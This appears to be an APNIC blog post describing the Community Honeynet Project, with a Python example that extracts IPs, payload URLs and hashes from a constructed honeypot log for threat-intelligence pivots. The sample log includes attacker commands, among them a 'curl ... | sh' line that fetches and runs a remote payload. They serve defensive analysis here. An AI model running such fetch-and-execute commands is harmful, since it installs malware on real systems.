How can we defend against an enemy when we don’t even know who the enemy is?
It’s a key question — first asked by Lance Spitzner — that I put to participants in network security workshops when discussing why network security needs to be as proactive as it is reactive in order to mitigate potential incidents.
Apart from keeping abreast of the latest cybersecurity news and being actively involved in security incident response communities, such as FIRST or your local national Computer Emergency Response Team, another way to learn about how attacks work and what tools adversaries use is to deploy a honeypot.
A honeypot is an information system resource used by security analysts to learn about attacks for the purpose of research and/or detection. It is not a single application or technology, but a collection of standalone computers and servers set up to attract network-based attacks. They do this by emulating services that are actively targeted in the wild, such as Telnet or SSH, along with the known weaknesses of those services (default credentials, unpatched vulnerabilities) that attackers expect to find. Once a compromised device or attacker connects to a honeypot, we can collect a set of observables such as source IP addresses, hosts serving malicious code, or the techniques used to gain a foothold on the honeypot. From this, we might be able to learn about the bigger picture of the attack. A honeynet is a network of honeypots.
It’s something we started integrating into our network security workshops a few years back. Initially, the idea was to show how a system is compromised and then pivot to the different types of security controls that could have mitigated the attack in the first place. However, because many workshop participants showed interest in deploying honeypots, we started to think about how we could enable participants to do so in a more coordinated manner and use this as a platform for continuous learning or mentoring. This was the premise for the APNIC Community Honeynet Project.
Established in 2017, the Project has assisted network engineers and network security personnel throughout the Asia Pacific region with setting up individual honeypots in their networks; the data is shared via a dashboard that Community members have access to. By having a network of honeypots spread across more than 12 economies (and counting), we all have a greater understanding of certain types of attacks happening in the region.
From a training perspective, the Project has provided extra value for our participants. Not only does it provide live data to work with during workshops, but it helps participants to explore security outside of the classroom and expand their professional networks if they choose to set up a honeypot on their network and connect it to the honeynet. That said, the Project is open to anyone in the region who wants to participate — all it takes is a server and IP address.
More functions on the horizon
We are continually expanding the honeynet infrastructure to include features such as ‘case management’ and ‘observable’ analysis engines with TheHive and Cortex. These will help community partners to dig deeper into the data seen by the honeypots.
Cortex, for example, allows you to automate the analysis of different types of observables (IP addresses, domain names, files, hashes, email headers, URLs) with a single click, so that you don’t have to look them up manually on different sites. Typical use cases would be:
- Given an IP address — what else is known about its past (malicious) activities
- Given a URL from which a binary was downloaded to the honeypot — what other binaries has the same site served in the past?
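Before any of these lookups can happen, the raw honeypot session records have to be turned into observables. The script below is an added example (not code from the APNIC project or from the honeynet dashboard) showing the step that sits between the honeypot and tools like Cortex or MISP: it parses a constructed, simplified session log, pulls out the observable types mentioned above (source IPs, payload URLs and their hosts, SHA-256 hashes), and builds the two pivots described in the use cases: "what has this IP done?" and "what else has this payload host served?". The log format (`timestamp src_ip event detail`) and the sample records are assumptions made for the example, not the format of any real honeypot.

```python
"""Extract and pivot observables from (constructed) honeypot session logs."""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample records, not real honeynet data. Assumed format per line:
#   <timestamp> <source ip> <event> <detail>
# The hashes are placeholder hex strings, not hashes of real files.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z 203.0.113.7 login user=root pass=admin
2024-03-01T10:00:02Z 203.0.113.7 cmd wget http://198.51.100.5/bins/x.arm7 -O /tmp/x
2024-03-01T10:00:03Z 203.0.113.7 download url=http://198.51.100.5/bins/x.arm7 sha256={h1}
2024-03-01T11:12:40Z 198.51.100.23 login user=admin pass=1234
2024-03-01T11:12:41Z 198.51.100.23 cmd curl -s http://198.51.100.5/bins/x.mips | sh
2024-03-01T11:12:42Z 198.51.100.23 download url=http://198.51.100.5/bins/x.mips sha256={h2}
2024-03-01T12:00:00Z 203.0.113.7 cmd cat /proc/cpuinfo
2024-03-01T12:00:05Z not-an-ip login user=root pass=toor
""".format(h1="3a" * 32, h2="7b" * 32)

# URLs end at whitespace or at shell metacharacters commonly seen in payload
# fetch commands (pipes, quotes, semicolons, redirects).
URL_RE = re.compile(r"https?://[^\s'\"|;<>]+")
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b")


def parse_line(line):
    """Split one record into its fields; return None for malformed lines."""
    parts = line.strip().split(" ", 3)
    if len(parts) < 3:
        return None
    ts, src, event = parts[0], parts[1], parts[2]
    detail = parts[3] if len(parts) == 4 else ""
    try:
        ipaddress.ip_address(src)  # drop records whose source is not an IP
    except ValueError:
        return None
    return {"ts": ts, "src_ip": src, "event": event, "detail": detail}


def parse_log(text):
    """All well-formed records in the log, in file order."""
    return [r for r in (parse_line(ln) for ln in text.splitlines()) if r]


def extract_observables(text):
    """Collect the observable types a Cortex/MISP workflow would consume."""
    obs = {"src_ip": set(), "url": set(), "host": set(), "sha256": set()}
    for rec in parse_log(text):
        obs["src_ip"].add(rec["src_ip"])
        for url in URL_RE.findall(rec["detail"]):
            obs["url"].add(url)
            host = urlparse(url).hostname
            if host:
                obs["host"].add(host)
        obs["sha256"].update(SHA256_RE.findall(rec["detail"]))
    return obs


def urls_by_host(text):
    """Pivot: for each payload-serving host, the distinct URLs it served."""
    out = defaultdict(set)
    for url in extract_observables(text)["url"]:
        host = urlparse(url).hostname
        if host:
            out[host].add(url)
    return dict(out)


def activity_by_ip(text):
    """Pivot: for each attacking IP, its ordered (timestamp, event, detail) trail."""
    out = defaultdict(list)
    for rec in parse_log(text):
        out[rec["src_ip"]].append((rec["ts"], rec["event"], rec["detail"]))
    return dict(out)


if __name__ == "__main__":
    found = extract_observables(SAMPLE_LOG)
    for kind, values in found.items():
        print(f"{kind}: {sorted(values)}")
    for host, urls in urls_by_host(SAMPLE_LOG).items():
        print(f"{host} served {len(urls)} distinct payloads")
    for ip, trail in activity_by_ip(SAMPLE_LOG).items():
        print(f"{ip}: {len(trail)} events, first {trail[0][1]}, last {trail[-1][1]}")
```

Each set in the result maps directly onto an observable data type you would hand to an analyzer or share as a MISP attribute: `src_ip` answers the first use case above, while `urls_by_host` answers the second by grouping every payload URL under the host that served it. Malformed records are discarded rather than guessed at, so a corrupted line cannot inject a bogus indicator into the shared data set.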
Additionally, a lot of this information can be shared with the wider community through platforms such as MISP.
We are also working on tools to advise network operators about devices on their networks that are potentially infected with malware.
All these tools will be available to the community and APNIC Members and add to the growing number of free and open incident analyzers available that are helping us to better understand who our enemies are.
If you’d like to participate in the APNIC Community Honeynet Project or know more, please contact firstname.lastname@example.org or leave a comment below.
The views expressed by the authors of this blog are their own and do not necessarily reflect the views of APNIC. Please note a Code of Conduct applies to this blog.